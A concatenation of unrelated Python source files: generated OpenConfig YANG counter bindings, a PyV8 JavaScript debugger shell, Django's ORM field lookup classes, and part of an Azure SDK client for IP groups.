base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """sent must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="sent", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__sent = t
if hasattr(self, "_set"):
self._set()
def _unset_sent(self):
self.__sent = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_retransmit(self):
"""
Getter method for retransmit, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/retransmit (yang:counter32)
        YANG Description: The number of the specified type of PDU that have been
        retransmitted by the local system on the interface.
"""
return self.__retransmit
def _set_retransmit(self, v, load=False):
"""
Setter method for retransmit, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/retransmit (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_retransmit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_retransmit() directly.
        YANG Description: The number of the specified type of PDU that have been
        retransmitted by the local system on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """retransmit must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="retransmit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__retransmit = t
if hasattr(self, "_set"):
self._set()
def _unset_retransmit(self):
self.__retransmit = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
received = __builtin__.property(_get_received)
processed = __builtin__.property(_get_processed)
dropped = __builtin__.property(_get_dropped)
sent = __builtin__.property(_get_sent)
retransmit = __builtin__.property(_get_retransmit)
_pyangbind_elements = OrderedDict(
[
("received", received),
("processed", processed),
("dropped", dropped),
("sent", sent),
("retransmit", retransmit),
]
)
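# Usage note (an illustrative sketch, not part of the generated bindings): all of
# the counters above are config-false leaves, so they are exposed only as
# read-only properties. A backend filling in a hypothetical instance `node`
# would call the private setters directly, e.g. node._set_received(42) and
# node._set_processed(40), while consumers simply read node.received.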
|
|
#!/usr/bin/env python
import sys
import os
import os.path
import logging
import threading
import PyV8
class cmd(object):
def __init__(self, *alias):
self.alias = alias
def __call__(self, func):
def wrapped(*args, **kwds):
return func(*args, **kwds)
wrapped.alias = list(self.alias)
wrapped.alias.append(func.__name__)
wrapped.__name__ = func.__name__
wrapped.__doc__ = func.__doc__
return wrapped
class Debugger(PyV8.JSDebugger, threading.Thread):
log = logging.getLogger("dbg")
def __init__(self):
PyV8.JSDebugger.__init__(self)
threading.Thread.__init__(self, name='dbg')
self.terminated = False
self.exitcode = None
self.daemon = True
self.evalContext = PyV8.JSContext(Shell(self))
def __enter__(self):
script_filename = os.path.join(os.path.dirname(__file__), 'd8.js')
self.log.debug("loading d8.js from %s", script_filename)
with self.context as ctxt:
ctxt.eval(open(script_filename, 'r').read())
return PyV8.JSDebugger.__enter__(self)
def showCopyright(self):
print "jsdb with PyV8 v%s base on Google v8 engine v%s" % (PyV8.__version__, PyV8.JSEngine.version)
print "Apache License 2.0 <http://www.apache.org/licenses/LICENSE-2.0>"
def onMessage(self, msg):
self.log.info("Debug message: %s", msg)
return True
def onDebugEvent(self, type, state, evt):
json = evt.toJSONProtocol()
self.log.info("%s event: %s", type, json)
if type not in [PyV8.JSDebugger.Break, PyV8.JSDebugger.Exception, PyV8.JSDebugger.AfterCompile]:
return
with self.context as ctxt:
detail = ctxt.locals.DebugMessageDetails(json)
if len(detail.text) == 0:
return
print detail.text
cmd_processor = state.debugCommandProcessor()
running = False
while not running:
line = raw_input('> ' if running else 'dbg> ').strip()
if line == '': break
with self.context as ctxt:
request = ctxt.locals.DebugCommandToJSONRequest(line)
if not request: continue
response = cmd_processor.processDebugRequest(request)
detail = ctxt.locals.DebugMessageDetails(response)
if detail.text:
print detail.text
running = detail.running
def shell(self):
while not self.terminated:
line = raw_input('(jsdb) ').strip()
if line == '': continue
try:
with self.evalContext as ctxt:
result = ctxt.eval(line)
if result:
print result
except KeyboardInterrupt:
break
except Exception, e:
print e
return self.exitcode
def debug(self, line):
args = line.split(' ')
cmd = args[0]
args = args[1:]
func = self.alias.get(cmd)
if func is None:
print "Undefined command: '%s'. Try 'help'." % cmd
else:
try:
func(*args)
except Exception, e:
print e
@property
def cmds(self):
if not hasattr(self, '_cmds'):
self.buildCmds()
return self._cmds
@property
def alias(self):
if not hasattr(self, "_alias"):
self.buildCmds()
return self._alias
def buildCmds(self):
self._cmds = []
self._alias = {}
for name in dir(self):
attr = getattr(self, name)
if callable(attr) and hasattr(attr, 'alias'):
self._cmds.append(attr)
for name in attr.alias:
self._alias[name] = attr
self.log.info("found %d commands with %d alias", len(self._cmds), len(self._alias))
@cmd('h', '?')
def help(self, cmd=None, *args):
"""Print list of commands."""
if cmd:
func = self.alias.get(cmd)
if func is None:
print "Undefined command: '%s'. Try 'help'." % cmd
else:
print func.__doc__
else:
print "List of commands:"
print
for func in self.cmds:
print "%s -- %s" % (func.__name__, func.__doc__)
@cmd('q')
def quit(self):
"""Exit jsdb."""
self.terminated = True
class OS(PyV8.JSClass):
def system(self, *args):
return os.system(' '.join(args))
def chdir(self, path):
os.chdir(path)
def mkdirp(self, path):
os.makedirs(path)
def rmdir(self, path):
os.rmdir(path)
def getenv(self, name):
return os.getenv(name)
def setenv(self, name, value):
os.putenv(name, value)
def unsetenv(self, name):
os.unsetenv(name)
def umask(self, mask):
return os.umask(mask)
class Shell(PyV8.JSClass):
os = OS()
def __init__(self, debugger):
self.debugger = debugger
def debugBreak(self):
self.debugger.debugBreak()
self.debugger.processDebugMessages()
def quit(self, code=0):
self.debugger.terminated = True
self.debugger.exitcode = code
def writeln(self, *args):
self.write(*args)
print
def write(self, *args):
print ' '.join(args),
def read(self, filename):
return open(filename, 'r').read()
def readline(self):
return raw_input()
def load(self, *filenames):
for filename in filenames:
PyV8.JSContext.current.eval(open(filename).read())
def version(self):
print "PyV8 v%s with Google V8 v%s" % (PyV8.__version__, PyV8.JSEngine.version)
def parse_cmdline():
from optparse import OptionParser
parser = OptionParser(usage="Usage: %prog [options] <script file>")
parser.add_option("-q", "--quiet", action="store_const",
const=logging.FATAL, dest="logLevel", default=logging.WARN)
parser.add_option("-v", "--verbose", action="store_const",
const=logging.INFO, dest="logLevel")
parser.add_option("-d", "--debug", action="store_const",
const=logging.DEBUG, dest="logLevel")
parser.add_option("--log-format", dest="logFormat",
default="%(asctime)s %(levelname)s %(name)s %(message)s")
parser.add_option("--log-file", dest="logFile")
opts, args = parser.parse_args()
logging.basicConfig(level=opts.logLevel,
format=opts.logFormat,
filename=opts.logFile)
return opts, args
if __name__=='__main__':
opts, args = parse_cmdline()
with Debugger() as dbg:
dbg.showCopyright()
#dbg.start()
try:
exitcode = dbg.shell()
except KeyboardInterrupt:
exitcode = 0
sys.exit(exitcode)
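# Invocation sketch (assuming this script is saved as jsdb.py and PyV8 is
# importable): running `python jsdb.py -d` enables debug logging and drops into
# the `(jsdb)` REPL provided by Debugger.shell(); typing `quit()` there calls
# Shell.quit(), which sets `terminated`/`exitcode` and ends the loop.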
|
|
import itertools
import math
from copy import copy
from decimal import Decimal
from django.core.exceptions import EmptyResultSet
from django.db.models.expressions import Func, Value
from django.db.models.fields import (
DateTimeField, DecimalField, Field, IntegerField,
)
from django.db.models.query_utils import RegisterLookupMixin
from django.utils.functional import cached_property
class Lookup:
lookup_name = None
prepare_rhs = True
def __init__(self, lhs, rhs):
self.lhs, self.rhs = lhs, rhs
self.rhs = self.get_prep_lookup()
if hasattr(self.lhs, 'get_bilateral_transforms'):
bilateral_transforms = self.lhs.get_bilateral_transforms()
else:
bilateral_transforms = []
if bilateral_transforms:
# Warn the user as soon as possible if they are trying to apply
# a bilateral transformation on a nested QuerySet: that won't work.
from django.db.models.sql.query import Query # avoid circular import
if isinstance(rhs, Query):
raise NotImplementedError("Bilateral transformations on nested querysets are not supported.")
self.bilateral_transforms = bilateral_transforms
def apply_bilateral_transforms(self, value):
for transform in self.bilateral_transforms:
value = transform(value)
return value
def batch_process_rhs(self, compiler, connection, rhs=None):
if rhs is None:
rhs = self.rhs
if self.bilateral_transforms:
sqls, sqls_params = [], []
for p in rhs:
value = Value(p, output_field=self.lhs.output_field)
value = self.apply_bilateral_transforms(value)
value = value.resolve_expression(compiler.query)
sql, sql_params = compiler.compile(value)
sqls.append(sql)
sqls_params.extend(sql_params)
else:
_, params = self.get_db_prep_lookup(rhs, connection)
sqls, sqls_params = ['%s'] * len(params), params
return sqls, sqls_params
def get_source_expressions(self):
if self.rhs_is_direct_value():
return [self.lhs]
return [self.lhs, self.rhs]
def set_source_expressions(self, new_exprs):
if len(new_exprs) == 1:
self.lhs = new_exprs[0]
else:
self.lhs, self.rhs = new_exprs
def get_prep_lookup(self):
if hasattr(self.rhs, '_prepare'):
return self.rhs._prepare(self.lhs.output_field)
if self.prepare_rhs and hasattr(self.lhs.output_field, 'get_prep_value'):
return self.lhs.output_field.get_prep_value(self.rhs)
return self.rhs
def get_db_prep_lookup(self, value, connection):
return ('%s', [value])
def process_lhs(self, compiler, connection, lhs=None):
lhs = lhs or self.lhs
if hasattr(lhs, 'resolve_expression'):
lhs = lhs.resolve_expression(compiler.query)
return compiler.compile(lhs)
def process_rhs(self, compiler, connection):
value = self.rhs
if self.bilateral_transforms:
if self.rhs_is_direct_value():
# Do not call get_db_prep_lookup here as the value will be
# transformed before being used for lookup
value = Value(value, output_field=self.lhs.output_field)
value = self.apply_bilateral_transforms(value)
value = value.resolve_expression(compiler.query)
        # For historical reasons there are a couple of different ways to
        # produce the SQL here: get_compiler is likely a Query instance,
        # as_sql is anything exposing an as_sql() method, and finally the
        # value can simply be a plain Python value.
if hasattr(value, 'get_compiler'):
value = value.get_compiler(connection=connection)
if hasattr(value, 'as_sql'):
sql, params = compiler.compile(value)
return '(' + sql + ')', params
else:
return self.get_db_prep_lookup(value, connection)
def rhs_is_direct_value(self):
return not(
hasattr(self.rhs, 'as_sql') or
hasattr(self.rhs, 'get_compiler'))
def relabeled_clone(self, relabels):
new = copy(self)
new.lhs = new.lhs.relabeled_clone(relabels)
if hasattr(new.rhs, 'relabeled_clone'):
new.rhs = new.rhs.relabeled_clone(relabels)
return new
def get_group_by_cols(self):
cols = self.lhs.get_group_by_cols()
if hasattr(self.rhs, 'get_group_by_cols'):
cols.extend(self.rhs.get_group_by_cols())
return cols
def as_sql(self, compiler, connection):
raise NotImplementedError
@cached_property
def contains_aggregate(self):
return self.lhs.contains_aggregate or getattr(self.rhs, 'contains_aggregate', False)
@property
def is_summary(self):
return self.lhs.is_summary or getattr(self.rhs, 'is_summary', False)
class Transform(RegisterLookupMixin, Func):
"""
RegisterLookupMixin() is first so that get_lookup() and get_transform()
first examine self and then check output_field.
"""
bilateral = False
arity = 1
@property
def lhs(self):
return self.get_source_expressions()[0]
def get_bilateral_transforms(self):
if hasattr(self.lhs, 'get_bilateral_transforms'):
bilateral_transforms = self.lhs.get_bilateral_transforms()
else:
bilateral_transforms = []
if self.bilateral:
bilateral_transforms.append(self.__class__)
return bilateral_transforms
class BuiltinLookup(Lookup):
def process_lhs(self, compiler, connection, lhs=None):
lhs_sql, params = super().process_lhs(compiler, connection, lhs)
field_internal_type = self.lhs.output_field.get_internal_type()
db_type = self.lhs.output_field.db_type(connection=connection)
lhs_sql = connection.ops.field_cast_sql(
db_type, field_internal_type) % lhs_sql
lhs_sql = connection.ops.lookup_cast(self.lookup_name, field_internal_type) % lhs_sql
return lhs_sql, list(params)
def as_sql(self, compiler, connection):
lhs_sql, params = self.process_lhs(compiler, connection)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
params.extend(rhs_params)
rhs_sql = self.get_rhs_op(connection, rhs_sql)
return '%s %s' % (lhs_sql, rhs_sql), params
def get_rhs_op(self, connection, rhs):
return connection.operators[self.lookup_name] % rhs
class FieldGetDbPrepValueMixin:
"""
Some lookups require Field.get_db_prep_value() to be called on their
inputs.
"""
get_db_prep_lookup_value_is_iterable = False
def get_db_prep_lookup(self, value, connection):
# For relational fields, use the output_field of the 'field' attribute.
field = getattr(self.lhs.output_field, 'field', None)
get_db_prep_value = getattr(field, 'get_db_prep_value', None)
if not get_db_prep_value:
get_db_prep_value = self.lhs.output_field.get_db_prep_value
return (
'%s',
[get_db_prep_value(v, connection, prepared=True) for v in value]
if self.get_db_prep_lookup_value_is_iterable else
[get_db_prep_value(value, connection, prepared=True)]
)
class FieldGetDbPrepValueIterableMixin(FieldGetDbPrepValueMixin):
"""
Some lookups require Field.get_db_prep_value() to be called on each value
in an iterable.
"""
get_db_prep_lookup_value_is_iterable = True
def get_prep_lookup(self):
prepared_values = []
if hasattr(self.rhs, '_prepare'):
# A subquery is like an iterable but its items shouldn't be
# prepared independently.
return self.rhs._prepare(self.lhs.output_field)
for rhs_value in self.rhs:
if hasattr(rhs_value, 'resolve_expression'):
# An expression will be handled by the database but can coexist
# alongside real values.
pass
elif self.prepare_rhs and hasattr(self.lhs.output_field, 'get_prep_value'):
rhs_value = self.lhs.output_field.get_prep_value(rhs_value)
prepared_values.append(rhs_value)
return prepared_values
def process_rhs(self, compiler, connection):
if self.rhs_is_direct_value():
# rhs should be an iterable of values. Use batch_process_rhs()
# to prepare/transform those values.
return self.batch_process_rhs(compiler, connection)
else:
return super().process_rhs(compiler, connection)
def resolve_expression_parameter(self, compiler, connection, sql, param):
params = [param]
if hasattr(param, 'resolve_expression'):
param = param.resolve_expression(compiler.query)
if hasattr(param, 'as_sql'):
sql, params = param.as_sql(compiler, connection)
return sql, params
def batch_process_rhs(self, compiler, connection, rhs=None):
pre_processed = super().batch_process_rhs(compiler, connection, rhs)
# The params list may contain expressions which compile to a
# sql/param pair. Zip them to get sql and param pairs that refer to the
# same argument and attempt to replace them with the result of
# compiling the param step.
sql, params = zip(*(
self.resolve_expression_parameter(compiler, connection, sql, param)
for sql, param in zip(*pre_processed)
))
params = itertools.chain.from_iterable(params)
return sql, tuple(params)
@Field.register_lookup
class Exact(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'exact'
@Field.register_lookup
class IExact(BuiltinLookup):
lookup_name = 'iexact'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params:
params[0] = connection.ops.prep_for_iexact_query(params[0])
return rhs, params
@Field.register_lookup
class GreaterThan(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'gt'
@Field.register_lookup
class GreaterThanOrEqual(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'gte'
@Field.register_lookup
class LessThan(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'lt'
@Field.register_lookup
class LessThanOrEqual(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'lte'
class IntegerFieldFloatRounding:
"""
Allow floats to work as query values for IntegerField. Without this, the
decimal portion of the float would always be discarded.
"""
def get_prep_lookup(self):
if isinstance(self.rhs, float):
self.rhs = math.ceil(self.rhs)
return super().get_prep_lookup()
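# Illustrative example (model/field names are assumptions): because
# get_prep_lookup() applies math.ceil() to float right-hand sides, a query
# such as Entry.objects.filter(rating__gte=2.1) is prepared as rating__gte=3
# instead of having the decimal portion silently discarded (rating__gte=2).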
@IntegerField.register_lookup
class IntegerGreaterThanOrEqual(IntegerFieldFloatRounding, GreaterThanOrEqual):
pass
@IntegerField.register_lookup
class IntegerLessThan(IntegerFieldFloatRounding, LessThan):
pass
class DecimalComparisonLookup:
def as_sqlite(self, compiler, connection):
lhs_sql, params = self.process_lhs(compiler, connection)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
params.extend(rhs_params)
# For comparisons whose lhs is a DecimalField, cast rhs AS NUMERIC
# because the rhs will have been converted to a string by the
# rev_typecast_decimal() adapter.
if isinstance(self.rhs, Decimal):
rhs_sql = 'CAST(%s AS NUMERIC)' % rhs_sql
rhs_sql = self.get_rhs_op(connection, rhs_sql)
return '%s %s' % (lhs_sql, rhs_sql), params
@DecimalField.register_lookup
class DecimalGreaterThan(DecimalComparisonLookup, GreaterThan):
pass
@DecimalField.register_lookup
class DecimalGreaterThanOrEqual(DecimalComparisonLookup, GreaterThanOrEqual):
pass
@DecimalField.register_lookup
class DecimalLessThan(DecimalComparisonLookup, LessThan):
pass
@DecimalField.register_lookup
class DecimalLessThanOrEqual(DecimalComparisonLookup, LessThanOrEqual):
pass
@Field.register_lookup
class In(FieldGetDbPrepValueIterableMixin, BuiltinLookup):
lookup_name = 'in'
def process_rhs(self, compiler, connection):
db_rhs = getattr(self.rhs, '_db', None)
if db_rhs is not None and db_rhs != connection.alias:
raise ValueError(
"Subqueries aren't allowed across different databases. Force "
"the inner query to be evaluated using `list(inner_query)`."
)
if self.rhs_is_direct_value():
try:
rhs = set(self.rhs)
except TypeError: # Unhashable items in self.rhs
rhs = self.rhs
if not rhs:
raise EmptyResultSet
# rhs should be an iterable; use batch_process_rhs() to
# prepare/transform those values.
sqls, sqls_params = self.batch_process_rhs(compiler, connection, rhs)
placeholder = '(' + ', '.join(sqls) + ')'
return (placeholder, sqls_params)
else:
return super().process_rhs(compiler, connection)
def get_rhs_op(self, connection, rhs):
return 'IN %s' % rhs
def as_sql(self, compiler, connection):
max_in_list_size = connection.ops.max_in_list_size()
if self.rhs_is_direct_value() and max_in_list_size and len(self.rhs) > max_in_list_size:
return self.split_parameter_list_as_sql(compiler, connection)
return super().as_sql(compiler, connection)
def split_parameter_list_as_sql(self, compiler, connection):
# This is a special case for databases which limit the number of
# elements which can appear in an 'IN' clause.
max_in_list_size = connection.ops.max_in_list_size()
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.batch_process_rhs(compiler, connection)
in_clause_elements = ['(']
params = []
for offset in range(0, len(rhs_params), max_in_list_size):
if offset > 0:
in_clause_elements.append(' OR ')
in_clause_elements.append('%s IN (' % lhs)
params.extend(lhs_params)
sqls = rhs[offset: offset + max_in_list_size]
sqls_params = rhs_params[offset: offset + max_in_list_size]
param_group = ', '.join(sqls)
in_clause_elements.append(param_group)
in_clause_elements.append(')')
params.extend(sqls_params)
in_clause_elements.append(')')
return ''.join(in_clause_elements), params
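# Shape of the generated SQL (illustrative, assuming max_in_list_size == 3 and
# five right-hand values for a column "col"):
#   (col IN (%s, %s, %s) OR col IN (%s, %s))
# i.e. the value list is split into chunks and the chunks are OR-ed together.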
class PatternLookup(BuiltinLookup):
def get_rhs_op(self, connection, rhs):
# Assume we are in startswith. We need to produce SQL like:
# col LIKE %s, ['thevalue%']
# For python values we can (and should) do that directly in Python,
# but if the value is for example reference to other column, then
# we need to add the % pattern match to the lookup by something like
# col LIKE othercol || '%%'
# So, for Python values we don't need any special pattern, but for
# SQL reference values or SQL transformations we need the correct
# pattern added.
if hasattr(self.rhs, 'get_compiler') or hasattr(self.rhs, 'as_sql') or self.bilateral_transforms:
pattern = connection.pattern_ops[self.lookup_name].format(connection.pattern_esc)
return pattern.format(rhs)
else:
return super().get_rhs_op(connection, rhs)
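# Concrete illustration of the comment above (a sketch; field names are made
# up): for filter(headline__startswith='val') the pattern is added in Python by
# StartsWith.process_rhs(), giving params ['val%'], whereas for
# filter(headline__startswith=F('slug')) the right-hand side has as_sql(), so
# the pattern comes from connection.pattern_ops, roughly LIKE slug || '%'.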
@Field.register_lookup
class Contains(PatternLookup):
lookup_name = 'contains'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class IContains(Contains):
lookup_name = 'icontains'
prepare_rhs = False
@Field.register_lookup
class StartsWith(PatternLookup):
lookup_name = 'startswith'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class IStartsWith(PatternLookup):
lookup_name = 'istartswith'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class EndsWith(PatternLookup):
lookup_name = 'endswith'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class IEndsWith(PatternLookup):
lookup_name = 'iendswith'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class Range(FieldGetDbPrepValueIterableMixin, BuiltinLookup):
lookup_name = 'range'
def get_rhs_op(self, connection, rhs):
return "BETWEEN %s AND %s" % (rhs[0], rhs[1])
@Field.register_lookup
class IsNull(BuiltinLookup):
lookup_name = 'isnull'
prepare_rhs = False
def as_sql(self, compiler, connection):
sql, params = compiler.compile(self.lhs)
if self.rhs:
return "%s IS NULL" % sql, params
else:
return "%s IS NOT NULL" % sql, params
@Field.register_lookup
class Regex(BuiltinLookup):
lookup_name = 'regex'
prepare_rhs = False
def as_sql(self, compiler, connection):
if self.lookup_name in connection.operators:
return super().as_sql(compiler, connection)
else:
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
sql_template = connection.ops.regex_lookup(self.lookup_name)
return sql_template % (lhs, rhs), lhs_params + rhs_params
@Field.register_lookup
class IRegex(Regex):
lookup_name = 'iregex'
class YearLookup(Lookup):
def year_lookup_bounds(self, connection, year):
output_field = self.lhs.lhs.output_field
if isinstance(output_field, DateTimeField):
bounds = connection.ops.year_lookup_bounds_for_datetime_field(year)
else:
bounds = connection.ops.year_lookup_bounds_for_date_field(year)
return bounds
class YearComparisonLookup(YearLookup):
def as_sql(self, compiler, connection):
# We will need to skip the extract part and instead go
# directly with the originating field, that is self.lhs.lhs.
lhs_sql, params = self.process_lhs(compiler, connection, self.lhs.lhs)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
rhs_sql = self.get_rhs_op(connection, rhs_sql)
start, finish = self.year_lookup_bounds(connection, rhs_params[0])
params.append(self.get_bound(start, finish))
return '%s %s' % (lhs_sql, rhs_sql), params
def get_rhs_op(self, connection, rhs):
return connection.operators[self.lookup_name] % rhs
    def get_bound(self, start, finish):
        raise NotImplementedError(
            'subclasses of YearComparisonLookup must provide a get_bound() method'
        )
class YearExact(YearLookup, Exact):
lookup_name = 'exact'
def as_sql(self, compiler, connection):
# We will need to skip the extract part and instead go
# directly with the originating field, that is self.lhs.lhs.
lhs_sql, params = self.process_lhs(compiler, connection, self.lhs.lhs)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
try:
# Check that rhs_params[0] exists (IndexError),
# it isn't None (TypeError), and is a number (ValueError)
int(rhs_params[0])
except (IndexError, TypeError, ValueError):
# Can't determine the bounds before executing the query, so skip
# optimizations by falling back to a standard exact comparison.
return super().as_sql(compiler, connection)
bounds = self.year_lookup_bounds(connection, rhs_params[0])
params.extend(bounds)
return '%s BETWEEN %%s AND %%s' % lhs_sql, params
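# Resulting SQL shape (illustrative; model/field names are made up): a filter
# such as Entry.objects.filter(pub_date__year=2014) compiles to
#   "pub_date" BETWEEN %s AND %s
# with both parameters taken from year_lookup_bounds(), so no per-row
# EXTRACT() of the year is needed.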
class YearGt(YearComparisonLookup):
lookup_name = 'gt'
def get_bound(self, start, finish):
return finish
class YearGte(YearComparisonLookup):
lookup_name = 'gte'
def get_bound(self, start, finish):
return start
class YearLt(YearComparisonLookup):
lookup_name = 'lt'
def get_bound(self, start, finish):
return start
class YearLte(YearComparisonLookup):
lookup_name = 'lte'
def get_bound(self, start, finish):
return finish
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class IpGroupsOperations(object):
"""IpGroupsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.IpGroup"
"""Gets the specified ipGroups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param expand: Expands resourceIds (of Firewalls/Network Security Groups etc.) back referenced
by the IpGroups resource.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IpGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
parameters, # type: "_models.IpGroup"
**kwargs # type: Any
):
# type: (...) -> "_models.IpGroup"
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
